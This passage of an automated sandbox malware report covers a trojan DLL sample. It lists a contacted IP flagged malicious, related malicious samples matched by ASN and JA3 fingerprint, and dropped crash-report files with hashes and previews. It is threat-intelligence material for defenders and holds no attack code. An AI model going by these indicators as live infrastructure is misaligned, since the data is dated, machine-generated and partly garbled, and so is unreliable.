                        http://help.disneyplus.com.svchost.exe, 0000001C.00000003.672417504.00000214D4D8D000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672459141.00000214D4DCE000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672477338.00000214D4DAE000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://disneyplus.com/legal.svchost.exe, 0000001C.00000003.672417504.00000214D4D8D000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672459141.00000214D4DCE000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672477338.00000214D4DAE000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown

                        Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public

                        IPDomainCountryFlagASNASN NameMalicious
                        45.63.5.129
                        		unknownUnited States
                        		20473AS-CHOOPAUStrue

                        General Information

                        Joe Sandbox Version:34.0.0 Boulder Opal
                        Analysis ID:532312
                        Start date:02.12.2021
                        Start time:00:42:16
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 12m 36s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:efELSMI5R4 (renamed file extension from none to dll)
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:33
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal88.troj.evad.winDLL@41/21@0/1
                        EGA Information:Failed
                        HDC Information:
                        • Successful, ratio: 21.3% (good quality ratio 20.1%)
                        • Quality average: 71.2%
                        • Quality standard deviation: 25.5%
                        HCA Information:
                        • Successful, ratio: 83%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Override analysis time to 240s for rundll32
                        Warnings:
                        Show All
                        • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, wuapihost.exe
                        • Excluded IPs from analysis (whitelisted): 104.208.16.94, 20.54.110.249
                        • Excluded domains from analysis (whitelisted): displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, blobcollector.events.data.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net, onedsblobprdcus16.centralus.cloudapp.azure.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        00:44:15API Interceptor1x Sleep call for process: MpCmdRun.exe modified
                        00:45:46API Interceptor1x Sleep call for process: WerFault.exe modified
                        00:46:11API Interceptor7x Sleep call for process: svchost.exe modified

                        Joe Sandbox View / Context

                        IPs

                        No context

                        Domains

                        No context

                        ASN

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        AS-CHOOPAUSImSL42AOtZ.exeGet hashmaliciousBrowse
                        • 45.63.36.79
                        spZRMihlrkFGqYq1f.dllGet hashmaliciousBrowse
                        • 66.42.57.149
                        spZRMihlrkFGqYq1f.dllGet hashmaliciousBrowse
                        • 66.42.57.149
                        iU17wh2uUd.exeGet hashmaliciousBrowse
                        • 149.28.253.196
                        iU17wh2uUd.exeGet hashmaliciousBrowse
                        • 149.28.253.196
                        Sz4lxTmH7r.exeGet hashmaliciousBrowse
                        • 149.28.253.196
                        7AF33E5528AB8A8F45EE7B8C4DD24B4014FEAA6E1D310.exeGet hashmaliciousBrowse
                        • 149.28.253.196
                        RFIlSRQKzj.exeGet hashmaliciousBrowse
                        • 45.32.115.235
                        setup_x86_x64_install.exeGet hashmaliciousBrowse
                        • 149.28.253.196
                        991D4DC612FF80AB2506510DBA31531DB995FE3F64318.exeGet hashmaliciousBrowse
                        • 149.28.253.196
                        MMUc2aeWxZ.exeGet hashmaliciousBrowse
                        • 149.28.253.196
                        0pvsj0MF1D.exeGet hashmaliciousBrowse
                        • 149.28.253.196
                        Linux_amd64Get hashmaliciousBrowse
                        • 45.32.162.141
                        nkXzJnW7AH.exeGet hashmaliciousBrowse
                        • 149.28.253.196
                        67MPsax8fd.exeGet hashmaliciousBrowse
                        • 136.244.117.138
                        Linux_x86Get hashmaliciousBrowse
                        • 45.77.44.252
                        uI6mJo4TJQ.exeGet hashmaliciousBrowse
                        • 149.28.253.196
                        uI6mJo4TJQ.exeGet hashmaliciousBrowse
                        • 149.28.253.196
                        M2jG6lMe7Y.exeGet hashmaliciousBrowse
                        • 202.182.120.6
                        7LPqKhiPCL.exeGet hashmaliciousBrowse
                        • 139.180.133.9

                        JA3 Fingerprints

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        51c64c77e60f3980eea90869b68c58a8TYLNb8VvnmYA.dllGet hashmaliciousBrowse
                        • 45.63.5.129
                        2gyA5uNl6VPQUA.dllGet hashmaliciousBrowse
                        • 45.63.5.129
                        spZRMihlrkFGqYq1f.dllGet hashmaliciousBrowse
                        • 45.63.5.129
                        spZRMihlrkFGqYq1f.dllGet hashmaliciousBrowse
                        • 45.63.5.129
                        fehiVK2JSx.dllGet hashmaliciousBrowse
                        • 45.63.5.129
                        kQ9HU0gKVH.exeGet hashmaliciousBrowse
                        • 45.63.5.129
                        gvtdsqavfej.dllGet hashmaliciousBrowse
                        • 45.63.5.129
                        mhOX6jll6x.dllGet hashmaliciousBrowse
                        • 45.63.5.129
                        dguQYT8p8j.dllGet hashmaliciousBrowse
                        • 45.63.5.129
                        jSxIzXfwc7.dllGet hashmaliciousBrowse
                        • 45.63.5.129
                        mhOX6jll6x.dllGet hashmaliciousBrowse
                        • 45.63.5.129
                        X2XCewI2Yy.dllGet hashmaliciousBrowse
                        • 45.63.5.129
                        dguQYT8p8j.dllGet hashmaliciousBrowse
                        • 45.63.5.129
                        date1%3fBNLv65=pAAS.dllGet hashmaliciousBrowse
                        • 45.63.5.129
                        HMvjzUYq2h.dllGet hashmaliciousBrowse
                        • 45.63.5.129
                        s9BZBDWmi4.dllGet hashmaliciousBrowse
                        • 45.63.5.129
                        bFx5bZRC6P.dllGet hashmaliciousBrowse
                        • 45.63.5.129
                        c7IUEh66u6.dllGet hashmaliciousBrowse
                        • 45.63.5.129
                        HMvjzUYq2h.dllGet hashmaliciousBrowse
                        • 45.63.5.129
                        s9BZBDWmi4.dllGet hashmaliciousBrowse
                        • 45.63.5.129

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_8c5962cbbdb13a8671f1f3c3793157e73bd5d897_d70d8aa6_09efe6a1\Report.wer
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.6754551774972452
                        Encrypted:false
                        SSDEEP:96:P7/jKZqyHy9hkoyt7JfapXIQcQ5c6A2cE2cw33+a+z+HbHgIVG4rmMOyWZAXGng/:TLoB2HnM28jj8q/u7siS274ItW
                        MD5:519B12A445EE049708691A6E7B16C4CA
                        SHA1:32D3A6E3661935CF9AEAFC9935DAC440FA484D4C
                        SHA-256:6276E8D1AEC9B8964A389F6231360F7450B4B4AEC72C8B28669E03DEE8C93A80
                        SHA-512:C9590F7441E08FCBA300D11638AED1A292523B9D6C8C1AE23493AE97FE056DD3DFA181239057BF09453973D1D3630373D51F35A69A0534B4E149FDDB7EDAB600
                        Malicious:false
                        Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.2.9.0.8.3.3.0.3.4.0.7.8.0.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.1.a.d.d.f.c.5.-.9.a.a.7.-.4.9.9.6.-.8.7.4.4.-.5.7.8.c.4.d.6.5.6.4.1.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.1.9.4.6.9.6.8.-.d.a.d.b.-.4.d.6.8.-.9.5.a.e.-.f.7.9.6.0.5.f.3.2.3.1.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.0.4.-.0.0.0.1.-.0.0.1.c.-.3.2.1.2.-.1.1.a.3.5.8.e.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.0.9././.2.8.:.1.1.:.5.3.:.0.5.!.0.!.l.o.a.d.d.l.l.3.2...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.
                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_d71d33d652a62c864cb684e881f783bcee8c2df7_d70d8aa6_17200f86\Report.wer
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                        Category:modified
                        Size (bytes):65536
                        Entropy (8bit):0.6786083513367968
                        Encrypted:false
                        SSDEEP:96:y6FFJjKZqycy9hk1Dg3fWpXIQcQec6kxcEicw3DH+a+z+HbHgIVG4rmMOyWZAXGA:xF3oB0HQ4xoXj8q/u7siS274ItW
                        MD5:CCD4E670F6E0FD8F16CEA2A17AE5D3B6
                        SHA1:0FA826EAD3722AFBBA9C30D364A36C6D7962E95F
                        SHA-256:F47E9FFC535B549A1F0B11E7EC861A733F99D950299EE6A73B00A722FF623387
                        SHA-512:7E9789D95CC820652B262FA01FFE14DFA25E8A55E956F1299BC1C83ED99CE9FD50255D7BE4B011D71B7677C11B6E5DAC15DF6E62B9988E7857F119CD181A7A4F
                        Malicious:false
                        Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.2.9.0.8.3.4.0.3.6.5.6.8.2.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.2.9.0.8.3.4.5.1.6.2.5.4.1.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.0.6.d.0.6.5.0.-.b.d.0.5.-.4.1.9.2.-.9.e.1.0.-.3.2.1.7.9.a.7.b.8.6.7.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.5.d.9.b.6.c.0.-.b.0.d.6.-.4.7.a.9.-.8.0.e.2.-.a.c.b.9.f.3.d.9.2.4.d.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.0.4.-.0.0.0.1.-.0.0.1.c.-.3.2.1.2.-.1.1.a.3.5.8.e.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER20B.tmp.xml
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4558
                        Entropy (8bit):4.4286066367901995
                        Encrypted:false
                        SSDEEP:48:cvIwSD8zspJgtWI9PfWSC8B4a8fm8M4J2yGtFgV+q84tj9tKcQIcQwQud:uITf7QOSNuJEWx9tKkwQud
                        MD5:36DC4E2BDC01D672F8486704401DF7C3
                        SHA1:AF97460BC10F8446A011F7F0F9C6F2B12C8540C0
                        SHA-256:9C05BE63346A1C2FA16AC8F9DE7CC6398F05CC44F153FF6D57C844D56A4A0B7F
                        SHA-512:8DCFF5650ECE5641F52761CDA51CF83BBD14EA15F80F15E5D02D0E31B6887E57BB0858C10B99AA7BE3A49CB7A07FBEA37B5B91A3F9820C613AA79AAEA2B185A6
                        Malicious:false
                        Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1279796" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER2267.tmp.csv
                        Process:C:\Windows\System32\svchost.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):51112
                        Entropy (8bit):3.0656805850873763
                        Encrypted:false
                        SSDEEP:1536:Q7H6JWZtd0Mtf2loP4kSLpN7Fe+UHq9oq:Q7H6JWZtd0Mtf2loP4kSLz7Fe+UHq9oq
                        MD5:E91A2899D6B45701430454485E57F9AD
                        SHA1:25B8A43DD9F2C0D30B6E0892DB7693ABFFF52DC5
                        SHA-256:BB511E8DFAC2A05923CC2215B0A42DAB18852307FBFC808A69521D88F526DD4B
                        SHA-512:D3C8BD472241D8E7CF869F72DF2DBE71EB31D2718AC023B6A52E8389904F8817B31E2AB47034E9BF220D9073F2FDB31EF5E20F6AADD0E5C4CDF628729BF2EF32
                        Malicious:false
                        Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER2650.tmp.txt
                        Process:C:\Windows\System32\svchost.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):13340
                        Entropy (8bit):2.6957637466701168
                        Encrypted:false
                        SSDEEP:96:9GiZYWnClduRYoYxWfA2HCUYEZGCtCiDvOoxkWwtw2IaQihdMobIiY3:9jZDnb/QHCPaQihdMoUiY3
                        MD5:BB5A0508F1DC906444E12D7FF7C0B47C
                        SHA1:A8180F31565DED2FAAB9D05F8CD2E6D4E3A4A365
                        SHA-256:1675E0F2B4EE5B40E2EBE5996A7D72A2414A5E942B0CE4D9EE1809C27782617E
                        SHA-512:E16E490851A32B342FB3B3BD112E4C5C445590FE1F641F4B9A094AC218A299A3299BD75F6CB56E6DB95C2AD69F7A28318093147460CBD168A7FA862FC63E1D48
                        Malicious:false
                        Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER442A.tmp.csv
                        Process:C:\Windows\System32\svchost.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):50736
                        Entropy (8bit):3.067413848116051
                        Encrypted:false
                        SSDEEP:768:mlHP0PBtEtb8nvcbqq0Mpf2jsIj6fL5a8JFQlRrX6pBB:mlHP0kmvnq0Mpf2jsIj6fVfJFQlRrXg
                        MD5:803E6C65E05E444CC6D1234CF13CF698
                        SHA1:201646938AD21499C4446FD4159ACEB037755D36
                        SHA-256:0341B3AFAB60971EFE6B68E35AF935FBAD56E6839CCE467968A460E614D030EC
                        SHA-512:B7BE0875BF25E891CAE62FB082D0C3C37FC68A35423E1AB05F19E42F4D0B1A0CCF95A089A47678614F293525CE4174555DA93DC6127EABCABC5E790C61DEB3D5
                        Malicious:false
                        Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER47E4.tmp.txt
                        Process:C:\Windows\System32\svchost.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):13340
                        Entropy (8bit):2.6958812411265396
                        Encrypted:false
                        SSDEEP:96:9GiZYWocWRksgYjYdWG0HdUYEZWdtBiMOikPwBxOaOiulooVI2D3:9jZDoctEjtIaOiulooq2D3
                        MD5:BCC0FBB5EA3D4F459A785BF7D40D04CF
                        SHA1:0AEDC449D95C2419CCD888AD1DA3693A7139C327
                        SHA-256:7C03C8D4FD2D8B2A001292421BDF8921526A7ABD2C0A5E271F4B1D2E84F0AB60
                        SHA-512:7365B1E98BF06F0AEA990ACCD4AD84518A6CFC42DB908FE346CD5FC7C250A1558B0979C47CA47F05CED96CDA52E0B366D68BACB70A1472B49E1340F315E7B398
                        Malicious:false
                        Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERCFCE.tmp.dmp
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Mini DuMP crash report, 15 streams, Thu Dec 2 08:45:33 2021, 0x1205a4 type
                        Category:dropped
                        Size (bytes):27124
                        Entropy (8bit):2.5227497585999266
                        Encrypted:false
                        SSDEEP:192:vn98xfZSOGRoR6ETXD19JBFdL66e5zB9/jm2Qc7NO:OZZtvR3bkhB9/jm2I
                        MD5:E5141806E722AB8D685803190E529910
                        SHA1:E7375311A45E87F4545F3A1FED9321BA37A5667C
                        SHA-256:CE0B8E9F3A2E2F8E894245630FD8FD6971ACD011578E02B7DE25AE66A2568595
                        SHA-512:32113A36B37B843C9D791E873C6675725DD94371F8F2B3A45A6EC04083C75E0B010BB67AA259C9AEDEABACF498B29BF5B517683B97DCFE7FE7E9C125DDB32F96
                        Malicious:false
                        Preview: MDMP....... ..........a............4...............H.......$...........................`.......8...........T...........h....]...........................................................................................U...........B......p.......GenuineIntelW...........T..............a*............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERDDA9.tmp.WERInternalMetadata.xml
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):8342
                        Entropy (8bit):3.6988259840759303
                        Encrypted:false
                        SSDEEP:192:Rrl7r3GLNi4D26D6YFwSUVegmfsSz1CpBD89b8isfnNUm:RrlsNi96D6YySUVegmfsSzL8hf7
                        MD5:42DAD3491F32B2156FE774868DCBB554
                        SHA1:0C2893932753C19EEBAE582C44714506F1BD2D6F
                        SHA-256:DCB65F16F4D0337855B5F95382D6AB207DB90474BE09EEAD95F10951A9BD9E37
                        SHA-512:9929CB1E5BB76D9BCB6F963151702123B401815774C66EFD9F381C2846B73C75405BE264B42E6C9314D5B79C8FB8DE5793CD6835270484E2C9DA6B7B592CAD27
                        Malicious:false
                        Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.0.4.<./.P.i.d.>.......
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERE06A.tmp.xml
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4598
                        Entropy (8bit):4.472927288004771
